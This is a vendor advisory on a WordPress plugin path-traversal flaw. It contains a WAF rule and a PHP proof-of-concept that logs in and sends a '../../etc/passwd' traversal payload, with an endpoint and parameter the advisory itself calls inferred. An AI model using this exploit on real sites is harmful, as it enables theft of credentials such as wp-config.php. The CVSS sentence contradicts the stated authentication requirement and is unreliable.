Atomic Edge analysis of CVE-2026-4659 (metadata-based):
This vulnerability is an authenticated path traversal flaw in the Unlimited Elements for Elementor WordPress plugin. It allows attackers with Contributor-level access or higher to read arbitrary files from the server’s filesystem. The flaw resides in the plugin’s handling of URLs for JSON or CSV data sources in a repeater widget, specifically within the URLtoRelative() and urlToPath() functions.
Atomic Edge research infers the root cause from the CWE-22 classification and the provided description. The URLtoRelative() function likely strips the site’s base URL from a user-supplied input via a simple string replacement. This process fails to sanitize directory traversal sequences like ‘../’. The cleanPath() function then normalizes directory separators but does not remove these traversal components. The description confirms these function behaviors. This allows a crafted URL containing path traversal sequences to bypass intended restrictions.
Exploitation requires an authenticated user to interact with a vulnerable widget setting that accepts a remote URL for JSON or CSV data. The attacker would supply a URL like http://victim-site.com/../../../../etc/passwd. After the plugin processes this URL, the domain is stripped, leaving a relative path with traversal sequences. This path is then concatenated with a base directory path and resolved, leading to the reading of a sensitive file outside the web root. The exact administrative endpoint (likely an AJAX handler or widget save action) is not specified in the metadata, but the attack vector involves a POST request to a plugin-specific action.
Effective remediation requires implementing proper path validation. The fix should validate that the final resolved path remains within an allowed directory, such as the WordPress uploads directory or a temporary cache folder. This can be achieved by using realpath() and checking the result against a whitelist, or by using basename() if only filenames are needed. The patched version 2.0.7 presumably adds such sanitization to the URLtoRelative() and cleanPath() functions or introduces a new validation layer.
The impact of successful exploitation is significant information disclosure. An attacker can read the WordPress configuration file (wp-config.php), which contains database credentials and secret keys. Other sensitive files like /etc/passwd, SSH keys, or application logs are also accessible. This data can enable further attacks, including full database compromise and site takeover. The CVSS score of 7.5 (High) reflects the high confidentiality impact with no authentication requirement for the network attack vector.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-4659 (metadata-based)
# This rule targets the path traversal via the Repeater JSON/CSV URL parameter.
# The rule blocks requests to the plugin's AJAX handler containing path traversal sequences in a specific parameter.
# The exact action name is inferred; adjust if the real hook differs.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20264659,phase:2,deny,status:403,chain,msg:'CVE-2026-4659 via Unlimited Elements for Elementor AJAX - Path Traversal',severity:'CRITICAL',tag:'CVE-2026-4659',tag:'WordPress',tag:'Plugin',tag:'Unlimited-Elements',tag:'Path-Traversal'"
SecRule ARGS_POST:action "@streq unlimited_elements_ajax_action" "chain"
SecRule ARGS_POST:url "@rx ..(?:%2e%2e|%252e%252e|\.\.|/..)*/"
"t:lowercase,t:urlDecodeUni,t:removeNulls"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4659 - Unlimited Elements For Elementor <= 2.0.6 - Authenticated (Contributor+) Arbitrary File Read via Path Traversal in Repeater JSON/CSV URL with Path Traversal
<?php
/*
* Proof of Concept for CVE-2026-4659.
* This script simulates an authenticated attack to read a local file via path traversal.
* The exact AJAX action or endpoint is inferred from common plugin patterns.
* Assumptions:
* 1. The attacker has valid Contributor-level credentials.
* 2. The vulnerable parameter is part of a widget save or preview request.
* 3. The endpoint is likely /wp-admin/admin-ajax.php with an action related to 'unlimited_elements'.
*/
$target_url = 'https://victim-site.com'; // CHANGE THIS
$username = 'contributor_user'; // CHANGE THIS
$password = 'contributor_pass'; // CHANGE THIS
$file_to_read = '/../../../../etc/passwd'; // Target file via traversal
// Construct the malicious URL. The plugin's URLtoRelative() will strip the domain.
$malicious_url = $target_url . $file_to_read;
// Login to obtain authentication cookies
$login_data = array(
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$login_response = curl_exec($ch);
// Check login success (simple check for dashboard redirect)
if (strpos($login_response, 'Dashboard') === false && strpos($login_response, 'wp-admin') === false) {
die("[!] Login failed. Check credentials.");
}
echo "[*] Logged in successfully.n";
// Send exploit request. The exact parameter name is inferred; common names include 'url' or 'csv_url'.
// The action is assumed to be a plugin-specific AJAX hook.
$exploit_params = array(
'action' => 'unlimited_elements_ajax_action', // Inferred placeholder
'url' => $malicious_url, // Inferred vulnerable parameter
'nonce' => 'placeholder_nonce' // Would need a valid nonce in real scenario
);
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_params));
$exploit_response = curl_exec($ch);
curl_close($ch);
// Output the response which may contain the file contents if debug output is enabled.
echo "[*] Response:n";
echo $exploit_response;
?>
